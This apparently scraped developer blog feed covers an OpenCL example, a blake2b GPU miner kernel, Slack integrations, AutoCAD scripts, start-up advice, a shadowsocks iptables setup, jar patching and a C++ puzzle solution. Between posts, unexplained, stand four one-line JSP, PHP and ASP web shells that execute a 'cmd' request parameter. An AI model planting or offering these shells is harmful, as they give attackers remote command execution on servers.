42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
#include <stdio.h>
#include <stdlib.h>
#ifdef __APPLE__
#include <OpenCL/opencl.h>
#else
#include <CL/cl.h>
#endif
#define MAX_SOURCE_SIZE (0x100000)
int main(void) {
// Create the two input vectors
int i;
const int LIST_SIZE = 1024;
int *A = (int*)malloc(sizeof(int)*LIST_SIZE);
int *B = (int*)malloc(sizeof(int)*LIST_SIZE);
for(i = 0; i < LIST_SIZE; i++) {
A[i] = i;
B[i] = LIST_SIZE - i;
}
// Load the kernel source code into the array source_str
FILE *fp;
char *source_str;
size_t source_size;
fp = fopen("vector_add_kernel.cl", "r");
if (!fp) {
fprintf(stderr, "Failed to load kernel.\n");
exit(1);
}
source_str = (char*)malloc(MAX_SOURCE_SIZE);
source_size = fread( source_str, 1, MAX_SOURCE_SIZE, fp);
fclose( fp );
// Get platform and device information
cl_platform_id platform_id = NULL;
cl_device_id device_id = NULL;
cl_uint ret_num_devices;
cl_uint ret_num_platforms;
cl_int ret = clGetPlatformIDs(1, &platform_id, &ret_num_platforms);
ret = clGetDeviceIDs( platform_id, CL_DEVICE_TYPE_DEFAULT, 1,
&device_id, &ret_num_devices);
// Create an OpenCL context
cl_context context = clCreateContext( NULL, 1, &device_id, NULL, NULL, &ret);
// Create a command queue
cl_command_queue command_queue = clCreateCommandQueue(context, device_id, 0, &ret);
// Create memory buffers on the device for each vector
cl_mem a_mem_obj = clCreateBuffer(context, CL_MEM_READ_ONLY,
LIST_SIZE * sizeof(int), NULL, &ret);
cl_mem b_mem_obj = clCreateBuffer(context, CL_MEM_READ_ONLY,
LIST_SIZE * sizeof(int), NULL, &ret);
cl_mem c_mem_obj = clCreateBuffer(context, CL_MEM_WRITE_ONLY,
LIST_SIZE * sizeof(int), NULL, &ret);
// Copy the lists A and B to their respective memory buffers
ret = clEnqueueWriteBuffer(command_queue, a_mem_obj, CL_TRUE, 0,
LIST_SIZE * sizeof(int), A, 0, NULL, NULL);
ret = clEnqueueWriteBuffer(command_queue, b_mem_obj, CL_TRUE, 0,
LIST_SIZE * sizeof(int), B, 0, NULL, NULL);
// Create a program from the kernel source
cl_program program = clCreateProgramWithSource(context, 1,
(const char **)&source_str, (const size_t *)&source_size, &ret);
// Build the program
ret = clBuildProgram(program, 1, &device_id, NULL, NULL, NULL);
// Create the OpenCL kernel
cl_kernel kernel = clCreateKernel(program, "vector_add", &ret);
// Set the arguments of the kernel
ret = clSetKernelArg(kernel, 0, sizeof(cl_mem), (void *)&a_mem_obj);
ret = clSetKernelArg(kernel, 1, sizeof(cl_mem), (void *)&b_mem_obj);
ret = clSetKernelArg(kernel, 2, sizeof(cl_mem), (void *)&c_mem_obj);
// Execute the OpenCL kernel on the list
size_t global_item_size = LIST_SIZE; // Process the entire lists
size_t local_item_size = 64; // Divide work items into groups of 64
ret = clEnqueueNDRangeKernel(command_queue, kernel, 1, NULL,
&global_item_size, &local_item_size, 0, NULL, NULL);
// Read the memory buffer C on the device to the local variable C
int *C = (int*)malloc(sizeof(int)*LIST_SIZE);
ret = clEnqueueReadBuffer(command_queue, c_mem_obj, CL_TRUE, 0,
LIST_SIZE * sizeof(int), C, 0, NULL, NULL);
// Display the result to the screen
for(i = 0; i < LIST_SIZE; i++)
printf("%d + %d = %d\n", A[i], B[i], C[i]);
// Clean up
ret = clFlush(command_queue);
ret = clFinish(command_queue);
ret = clReleaseKernel(kernel);
ret = clReleaseProgram(program);
ret = clReleaseMemObject(a_mem_obj);
ret = clReleaseMemObject(b_mem_obj);
ret = clReleaseMemObject(c_mem_obj);
ret = clReleaseCommandQueue(command_queue);
ret = clReleaseContext(context);
free(A);
free(B);
free(C);
return 0;
}
You can also refer to https://www.eriksmistad.no/getting-started-with-opencl-and-gpu-computing/ to get a more detailed getting started guide, and the above code is from that article.
The easiest way is to create a Makefile and in this way, we don’t need to remember those compile library and compilation parameters.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
ifeq ($(shell uname -s),Darwin)
CC ?= clang
LDLIBS += -lcurl -framework OpenCL
else
CC ?= gcc
LDLIBS += -lOpenCL -lcurl
endif
CFLAGS += -c -std=c11 -Wall -pedantic -O2
TARGET = vector-addition
SOURCES = vector-addition.c
OBJECTS = $(patsubst %.c,%.o,$(SOURCES))
all: $(TARGET)
%.o: %.c
$(CC) $(CFLAGS) -o $@ $<
$(TARGET): $(OBJECTS)
$(CC) -o $@ $^ $(LDLIBS)
clean:
rm -f $(TARGET) $(OBJECTS)
.PHONY: all clean
To write a GPU Miner with OpenCL is very easy now as all need to do is to implement an algorithm. As an exapmle, a GPU Miner for blake2b (from https://github.com/NebulousLabs/Sia-GPU-Miner/blob/master/sia-gpu-miner.cl):
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
static inline ulong rotr64( __const ulong w, __const unsigned c ) { return ( w >> c ) | ( w << ( 64 - c ) ); }
__constant static const uchar blake2b_sigma[12][16] = {
{ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15 } ,
{ 14, 10, 4, 8, 9, 15, 13, 6, 1, 12, 0, 2, 11, 7, 5, 3 } ,
{ 11, 8, 12, 0, 5, 2, 15, 13, 10, 14, 3, 6, 7, 1, 9, 4 } ,
{ 7, 9, 3, 1, 13, 12, 11, 14, 2, 6, 5, 10, 4, 0, 15, 8 } ,
{ 9, 0, 5, 7, 2, 4, 10, 15, 14, 1, 11, 12, 6, 8, 3, 13 } ,
{ 2, 12, 6, 10, 0, 11, 8, 3, 4, 13, 7, 5, 15, 14, 1, 9 } ,
{ 12, 5, 1, 15, 14, 13, 4, 10, 0, 7, 6, 3, 9, 2, 8, 11 } ,
{ 13, 11, 7, 14, 12, 1, 3, 9, 5, 0, 15, 4, 8, 6, 2, 10 } ,
{ 6, 15, 14, 9, 11, 3, 0, 8, 12, 2, 13, 7, 1, 4, 10, 5 } ,
{ 10, 2, 8, 4, 7, 6, 1, 5, 15, 11, 9, 14, 3, 12, 13, 0 } ,
{ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15 } ,
{ 14, 10, 4, 8, 9, 15, 13, 6, 1, 12, 0, 2, 11, 7, 5, 3 } };
// Target is passed in via headerIn[32 - 29]
__kernel void nonceGrind(__global ulong *headerIn, __global ulong *nonceOut) {
ulong target = headerIn[4];
ulong m[16] = { headerIn[0], headerIn[1],
headerIn[2], headerIn[3],
(ulong)get_global_id(0), headerIn[5],
headerIn[6], headerIn[7],
headerIn[8], headerIn[9], 0, 0, 0, 0, 0, 0 };
ulong v[16] = { 0x6a09e667f2bdc928, 0xbb67ae8584caa73b, 0x3c6ef372fe94f82b, 0xa54ff53a5f1d36f1,
0x510e527fade682d1, 0x9b05688c2b3e6c1f, 0x1f83d9abfb41bd6b, 0x5be0cd19137e2179,
0x6a09e667f3bcc908, 0xbb67ae8584caa73b, 0x3c6ef372fe94f82b, 0xa54ff53a5f1d36f1,
0x510e527fade68281, 0x9b05688c2b3e6c1f, 0xe07c265404be4294, 0x5be0cd19137e2179 };
#define G(r,i,a,b,c,d) \
a = a + b + m[blake2b_sigma[r][2*i]]; \
d = rotr64(d ^ a, 32); \
c = c + d; \
b = rotr64(b ^ c, 24); \
a = a + b + m[blake2b_sigma[r][2*i+1]]; \
d = rotr64(d ^ a, 16); \
c = c + d; \
b = rotr64(b ^ c, 63);
#define ROUND(r) \
G(r,0,v[ 0],v[ 4],v[ 8],v[12]); \
G(r,1,v[ 1],v[ 5],v[ 9],v[13]); \
G(r,2,v[ 2],v[ 6],v[10],v[14]); \
G(r,3,v[ 3],v[ 7],v[11],v[15]); \
G(r,4,v[ 0],v[ 5],v[10],v[15]); \
G(r,5,v[ 1],v[ 6],v[11],v[12]); \
G(r,6,v[ 2],v[ 7],v[ 8],v[13]); \
G(r,7,v[ 3],v[ 4],v[ 9],v[14]);
ROUND( 0 );
ROUND( 1 );
ROUND( 2 );
ROUND( 3 );
ROUND( 4 );
ROUND( 5 );
ROUND( 6 );
ROUND( 7 );
ROUND( 8 );
ROUND( 9 );
ROUND( 10 );
ROUND( 11 );
#undef G
#undef ROUND
if (as_ulong(as_uchar8(0x6a09e667f2bdc928 ^ v[0] ^ v[8]).s76543210) < target) {
*nonceOut = m[4];
return;
}
}
Please note after BitMain released A3 ASIC for blake2b algorithm (https://www.bitsonline.com/review-antminer-a3-blake-2b-asic-miner/), it’s not profitable anymore to mining blake2b coins with GPU.
Here, this code is only for learning GPU Miner.
Blake2: https://blake2.net/blake2.pdf
]]>Even if we count Simplified Chinese and Traditional Chinese as one language, we still have eight languages that are widely used in Southeast Asia.
It feels so different to be in such a diverse environment. It’s common that people don’t understand each other. The only thing we need is tolerance. When someone is saying something that’s so untrue to you, that doesn’t mean he/she is wrong. The first thing is not to deny it but to listen thoroughly and elaborate the reason behind. Most times I find it’s not right or wrong, it’s about different perspectives and aspects about a some problem.
To be finished.
]]>Which operating system, Windows, Linux or OS X, do you use as the default developing environment? Which operating system do you use as the production environment, Debian based, Red hat based, or Gentoo? Which cloud server do you use, AWS or other? Which language do you use as the main backend language, Python, Ruby, Node.js, or Java, PHP, C++? Which infrastructure do you use?
All those questions can have multiple answers. What you choose show what you believe. For some questions, there exists a best answer, but it’s a best answer to most people, someone still believe alternatives and have their reasons.
We human are so small and weak that we don’t even know where we come from and why we exist. We can not prove the existence of God and at the same time we can not prove God not exist. We just believe. We just prefer.
From my personal opinion, the best suit for a start up techinical team is:
There are still so many choices you need to make. Every choice you make makes a parallel universe and thus make you different from all the others.
]]>Actually, Slack is more than just a communication tool. What makes it extraordinary is it provides the possibility to integrate everything and make your workflow complete. In this post we’re highlighting some of the most useful new workflows that Slack is enabling. All these are currently heavily in use in our team, and we find they are exceptionally helpful.
The Jira integration posts messages once a task or bug changes its status, for instance, task created, task changed to Confirmed, In progress, Resolved, Verified etc.
To integrate Jira, you need to add JIRA to your slack with multiple configurations, one configuration for one channel. Configure the Status Changes
to * -> *
. Copy the Webhook URL
. On Jira, click Admin > System > WebHooks
and create multiple webhooks, one webhook for one channel. For each webhook, you can specify a JQL query to send only events triggered by matching issues. Paste the Webhook URL
to URL
field. Check all checkboxes under Issue
.
You may configure another channel just for QA. For this configuration, constrain the Status Changes
to * -> Resolved
. That’s because in our projects, we use a Bugzilla Workflow. Tasks moved to resolved are ready for QA to test. Of course it’s better to create a channel on Slack just for QA.
The above Slack app just track down the task status changes. If someone comment on a task, Slack will not receive the notification. That’s because the current Jira app for Slack doesn’t support comments feature. I believe it still need some time before we can use this feature. To work around this, we need Hubot.
Follow this link to install Hubot jira comment https://github.com/mnpk/hubot-jira-comment.
Hubot can do much more than that. Don’t forget, it’s a robot.
The Bitbucket integration posts messages about all commits, pull requests, comments and issues. The messages include links to events on Bitbucket’s.
Once configured, Jenkins sends messages on failed and successful builds to your Slack channel. All your team can easily get notified and stay informed of any change in your build.
Tools like Sentry report on exceptions and log errors that are happening in your application. After adding the appropriate code and build changes, these tools are able to get access to your errors, arggregate them, and report high level stats.
Get notified when errors happen.
One of the most often asked question in my team is where are we going for lunch today. With Lunchbox, we can easily propose some places for lunch and vote.
It can turn each sentence to a gif.
]]>Chinese text shows as a question mark (?) when opening the file in AutoCAD as opposed to the actual symbols
Often this is caused by a missing font file (.shx). Actually I do have this problem, so I search and find the missing shx called HZTXT.shx
, and put it under shx
folder. However, this only solved part of the problem, and some Chinese text still shows as a question mark (?).
Another cause is the TEXT objects. These objects cannot support multiple langues. Within the Chinese version of Windows, the one and only language is Chinese. On this platform, the TEXT object will display the proper characters. When the file is opened on a non-Chinese operating system, the limitation is encountered. When there is more than one language on the Windows Operating System, the TEXT object is still set to a different language.
MTEXT objects are able to support multiple languages. You will want to use the TXT2MTXT (Express Tools) command to convert the TEXT objects to MTEXT objects. If the TEXT objects are within a block, you will want to first enter the BLOCK EDITOR and then use the TXT2MTXT command.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
;changes text to individual mtext by Carl B.
(princ "\nType T2M to start")
(defun c:t2m ()
(setq Tset (ssget '((0 . "*TEXT")))) ;filter text in selection set
(setq Setlen (sslength Tset) ;setq number of entties in selection set, setq count(er) to 0
Count 0
) ;setq
(repeat SetLen ;repeat setlen times
(setq Ename (ssname Tset Count)) ;setq ename to be the "0..." entity in selection set Tset
(command "_txt2mtxt" Ename "")
(setq Count (+ 1 Count)) ; add 1 to Count(er)
) ; Repeat
(princ)
)
Copy the above code and paste to a file named t2m.lsp
.
Add this file to startup suite contents.
Now you can use T2M
command to process multiple TEXT to MTEXT individually.
I’m gonna talk this in 9 respects. They are not all ordered by importances, even though some are.
The most important thing is being aware of the big picture, ie the goal of this company, the current process, how many steps it’s gona be. Always focus to the most important things. Resources are limited, you’re gonna make a big differences and all these depends on how to use the limited resources to reslove the most critical problems in a limited time.
For an internet technology start up, you need to know how many software engineers, how many designers and how many products managers to hire for the first stage and the right sequences. Recruitment is hard for start ups. Work is heavier while salary is the same. Options can provide but if company dies you got nothing. Everyone knows that. For a start up, trust is essential for the first several members. So the initial guys are best to be friends for several years and know each other well enough and even though there are some diagreements you can work them out.
It’s best if you can contact some old friends and pull them in. Friends of friends are good as well. Just remeber don’t bring in office politics. Keep the work enviroment pure and simple.
For the technical recruitment, you need to draw a craft about the standard of hiring. For example, in my company, I set up 3 steps for the interviews. One need to pass all 3 steps to join in. First is a problem solving interview. There are 4 problems, and candidates can choose any one to solve in any language. This is for basic code knowledges and algorithm skills. In second, screen resume and HR related questions. In third, I’m gonna to ask questions face to face about work experiences and other stuff for capability assessment.
There is no IT department for a start up, at least when it starts. So you need to set up the office network, choose routers, switches, AP etc. You have to consider a lot of aspects. For example, I expect there will be about 20 staff for the first year, so I choose to use 2 Netgear WNDR4300, one for the main router and the other for wireless AP instead of using Cisco which is more expensive. After flushing the openwrt system to the routers, their performences are way good as now.
What people use what kind of computers? That’s not so important? Actually it’s not so unimpartant as it seems. People with good equipment can enormously increase productivity. In my company, I choose 27-inch iMac with Retina 5K display for designers, 2.6GHz Mac mini and two seperate displays for engineers. The 2.6GHz without SSD? Well I change the hard disk to SSD by myself for saving money and cool! Of course I have to buy 2 screwdriver (T6 and T9) and the warranty breaks, but it’s really cool. Right on.
It’s always good to use a dynamic language like Python or Ruby as the main server language for a start up. Advantages are obvious, just think about how much time you save, and time, is one of those critical parameters control whether a start up grows up or not. Well, it’s hard to recruitment? Nevermind, qualified engineers can learn. From my experience, it worth to do that kind of thing. That’s why you need a standard for recruitment because the HR only know to hire a PHP guy, an Android guy or a Java guy, or maybe 2-year experiences, 5-year experiences. They will never know this job should not do in this way. Seperating engineers by languages is stupid. That’s why I propose several algorithm quiz, and tell them whether she is graduated or not, whether she knows Node or Javascript, only need to work out one of the 4 algothim problems will we procee to the onsite interview.
I use some kinds of languages since primary school, from QBasic, C, VBasic, Pascal, ASM, C++ and then Java, PHP, Obj C, Python, Node. For most engineers I believe I learned more languages, but wait there are hundreds of languages, there! I’m not gonna show up. It’s just that I have a reason to choos Python for the current start up by comparing all these languages I know about.
For a start up, it’s common to ask questions like do we need to develop native app? do wee need to use cloud server? It’s easier to answer the second question. For most cases, if you are not dealing with sensitive data you should use cloud server because it saves time. Which cloud server should I have? The best. For now, it’s Amazon’s AWS. It’s a little bit trick to answer the first question. Well there are cross platform solutions for developing Android and iOS app at the same time, but if the budget is not so tight and time is allowed, I would advise to do develop the native app.
SCRUM is awesome, especially for a start up. Many big companies are striving to turing into SCRUM. However, for a start up, it’s a new company, why not use SCRUM at the first time? I would not figure out a reason for not using SCRUM.
To build a SCRUM, we need a series of tools. Jira for task management, Jenkins for continous integrement, and Github for code management. I also set up a wiki for knowledge store and product summary. All these systems linked up together. Besides that, we need to set up rules and get people obey the rules to run SCRUM smoothly.
As to taks assignment, it’s best to do this before a sprint starts, get the story points by discussing with product managers and get the estimate times by discussing with engineers, and reorder tasks by priority and assignment the right person. Normally once a sprint starts, the scope should not changes.
You need to balance different engineers’ interests, pressure and expertises. Track down the burning graph during the whole sprint, and reslove any obstcules you find. One thing is not gonna change forever, quality is the most important while scope or schedule is not, even though the remaining two are also very important.
You need to know product from a product perspective even though you are not a product manager. It helps when you argue with them when they think the cost is not correct for one feature. Just joking. Actually it’s more than that. You are in a team, everyone should think exchangebly. Only in this way can you help to make the priority list right.
You should always trust professional people do professinal stuff and you should always trust your coworkers. However you must have a good aesthetic taste otherwise you may disagree with designeers work. Try to be humble and learn to designers.
For one or two months, there should be a team building. Just go climbing or go swimming or do anything cool in a team. You will find many things about your colleagues you didn’t know before, and get some unexpected discoveries.
For new joined enginerrs, you have the responsibility to guid them, and point out a clear way to grow up if they need.
Tech sharing metting is a good way to learn technologies fast and know engineers at the same time. You should open it periodically.
At last, as a tech lead, you also should bear some development tasks and operation tasks. Your code should be canonical to other engineers. Talk is cheap, show me your code. So show your code to others.
]]>If your are using a TV supports Air play, you can just Air play your iPhone screen onto your TV.
]]>iptables
.
The easiest way I find from my recent research is with shadowsocks-libev. Shadowsocks-libev is a lightweight secured SOCKS5 proxy for embedded devices and low-end boxes. Shadowsocks-libev is written in pure C and only depends on libev and OpenSSL or PolarSSL. The use of mbedTLS is added but still for testing, and it is not officially supported yet.
Note the original shadowsocks doesn’t support ss-redir
, and shadowsocks-libev
seems to be the only port that supports ss-redir
. ss-redir
is different from ss-local
in that it’s TCP protocol rather than SOCKS protocol.
git clone https://github.com/leonsim/shadowsocks-libev.git
cd shadowsocks-libev
./configure && make
sudo make install
# Create new chain
iptables -t nat -N SHADOWSOCKS
iptables -t mangle -N SHADOWSOCKS
# Ignore your shadowsocks server's addresses
# It's very IMPORTANT, just be careful.
# Note 123.123.123.123 is the same as the remote server in /etc/config/shadowsocks.json
iptables -t nat -A SHADOWSOCKS -d 123.123.123.123 -j RETURN
# Ignore LANs and any other addresses you'd like to bypass the proxy
# See Wikipedia and RFC5735 for full list of reserved networks.
# See ashi009/bestroutetb for a highly optimized CHN route list.
iptables -t nat -A SHADOWSOCKS -d 0.0.0.0/8 -j RETURN
iptables -t nat -A SHADOWSOCKS -d 10.0.0.0/8 -j RETURN
iptables -t nat -A SHADOWSOCKS -d 127.0.0.0/8 -j RETURN
iptables -t nat -A SHADOWSOCKS -d 169.254.0.0/16 -j RETURN
iptables -t nat -A SHADOWSOCKS -d 172.16.0.0/12 -j RETURN
iptables -t nat -A SHADOWSOCKS -d 192.168.0.0/16 -j RETURN
iptables -t nat -A SHADOWSOCKS -d 224.0.0.0/4 -j RETURN
iptables -t nat -A SHADOWSOCKS -d 240.0.0.0/4 -j RETURN
# Anything else should be redirected to shadowsocks's local port
iptables -t nat -A SHADOWSOCKS -p tcp -j REDIRECT --to-ports 12345
# Add any UDP rules
ip rule add fwmark 0x01/0x01 table 100
ip route add local 0.0.0.0/0 dev lo table 100
iptables -t mangle -A SHADOWSOCKS -p udp --dport 53 -j TPROXY --on-port 12345 --tproxy-mark 0x01/0x01
# Apply the rules
iptables -t nat -A PREROUTING -p tcp -j SHADOWSOCKS
iptables -t mangle -A PREROUTING -j SHADOWSOCKS
# Start the shadowsocks-redir
ss-redir -u -c /etc/config/shadowsocks.json -f /var/run/shadowsocks.pid
If the UDP deosn’t work, just not use the UDP part, aka only use the TCP part.
Although shadowsocks-libev can handle thousands of concurrent connections nicely, we still recommend setting up your server’s firewall rules to limit connections from each user:
# Up to 32 connections are enough for normal usage
iptables -A INPUT -p tcp --syn --dport ${SHADOWSOCKS_PORT} -m connlimit --connlimit-above 32 -j REJECT --reject-with tcp-reset
This plugin allows for throttling the number of concurrent builds of a project running per node or globally.
This plugin integrates management of keychain and provisioning files for iOS and OSX projects.
PostBuildScript makes it possible to execute a set of scripts at the end of the build.
This plugin enables use of Atlassian Crowd as an authentication source. It uses Crowd’s REST API (available since Crowd 2.1) to access the services and supports single-sign-on.
This plugin integrates Jenkins to Atlassian JIRA.
This plugin notifies a Stash server of build results.
This plugin polls Atlassian Stash to determine whether there are Pull Requests that should be built.
This plugin parses Android Lint analysis results and visualises the issues found.
Starts an Android emulator with given properties before a build, then shuts it down after.
]]>To better understand the relationship between orignal text and the license text, I write a Python code to uncover the original text from a license text.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import zlib
import base64
def get_original_text(license):
license = ''.join(license.split())
i = license.rfind('X')
l = int(license[i + 3:], 31)
license = license[:l]
s = base64.b64decode(license)
l = ord(s[:4].decode('UTF-32BE'))
text, signature = s[4:4 + l], s[4 + l:]
ans = zlib.decompress(text[5:])
return ans.decode('utf-8')
license = '''
AAABJA.......
'''
print(get_original_text(license))
.class
file in a .jar
file.
After searching google and stack overflow for a while, I found this question is little cared, and almost all information is not complete.
So I wrap them up and make the whole process runnable.
Use luyten (or JD GUI if you don’t care its bugs) to decompile the jar, and save all files to folder srcdir
Modify a java file, then compile it to .class
file.
cd srcdir
vi com/.../A.java
cp some_folder/original.jar ./
javac -cp "original.jar" com/.../A.java
The last command will generate a file named A.class
in the same folder as A.java
Use luyten to check if the file A.class
is modified.
jar -uf original.jar com/.../A.class
mv original.jar modified.jar
This will generate a modified.jar
. Use luyten to check again if it’s modified.
Note: If A.java
depends other external jars other than original.jar
, Add them to classpath by
javac -cp "original.jar;lib/*" com/.../A.java
It’s important to use lib/*
rather than lib/*.jar
because the later will not work.
1
<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
1
<?php echo passthru($_GET['cmd']); ?>
1
<?php echo shell_exec($_GET['cmd']); ?>
<% eval request("cmd") %>
I wrap all this to a Python egg package, upload it to PyPi, and everyone who want to use this don’t need to copy & paste code any more. Just install it and use it.
pip install toutf8
This ships with a shell command, so after installing, just type
toutf8 FILENAME
to transform a single file to UTF-8 encoding, or
toutf8 PATHNAME
to transform all files in folder PATHNAME to UTF-8 encoding.
The script can detect the source encoding, so whether it being GBK, GB2312, GB18030, CP936 or Shift-jis, all will be transformed to UTF-8.
GBK --> UTF-8
GB2312 --> UTF-8
GB18030 --> UTF-8
CP936 --> UTF-8
Shift-jis --> UTF-8
Euc-jp --> UTF-8
Korean --> UTF-8
Vietnamese --> UTF-8
UTF-16LE --> UTF-8
UTF-16BE --> UTF-8
UTF-32 --> UTF-8
Use a regular expression to filter out which kinds of files should be transformed.
toutf8 PATHNAME .*txt
The biggest possible area of cake is \(16 \times 10 \times 10\), so the biggest possbile side of cake is \(40\).
Image a cake as a matrix with rows and colums. Each element of this matrix is a 1x1 cell. The problem can be translated to if there exists a method to fill this matrix with squares.
Now fill the matrix in this order: find the lowest leftmost empty cell \(C_{i,j}\). Find successive cells \(C_{i,j}, C_{i, j+1}, \dots, C_{i, j+w}\) with the same height as \(C_{i,j}\).
Choose a square and put it into an area with left upper cell as \(C_{i, j}\). If this can not construct a solution, backtrack to use another squre, otherwise continue to the end and get a solution.
Source code in C++:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
#include <iostream>
#include <cstring>
#include <algorithm>
using namespace std;
int s, n;
char cs[11], lens[41];
bool dfs(int x) {
if (x == n) {
return true;
}
int m = 1, w = 1, suc = 1;
for (int i = 2; i <= s; ++i) {
if (lens[i] < lens[m]) {
m = i, w = 1, suc = 1;
}
else if (lens[i] == lens[m] && suc) {
++w;
}
else {
suc = 0;
}
}
for (int i = min(10, w); i >= 1; --i) {
if (cs[i] > 0 && lens[m] + i <= s) {
cs[i]--;
for (int j = m; j < m + i; ++j) {
lens[j] += i;
}
if (dfs(x+1)) {
return true;
}
for (int j = m; j < m + i; ++j) {
lens[j] -= i;
}
cs[i]++;
}
}
return false;
}
bool solve() {
cin >> s >> n;
memset(cs, 0, sizeof(cs));
memset(lens, 0, sizeof(lens));
int sum = 0, tmp;
for (int i = 0; i < n; ++i) {
cin >> tmp;
cs[tmp]++;
sum += tmp*tmp;
}
if (sum != s*s) {
return false;
}
return dfs(0);
}
int main() {
int t;
cin >> t;
while(t--) {
if (solve()) {
cout << "KHOOOOB!" << endl;
}
else {
cout << "HUTUTU!" << endl;
}
}
}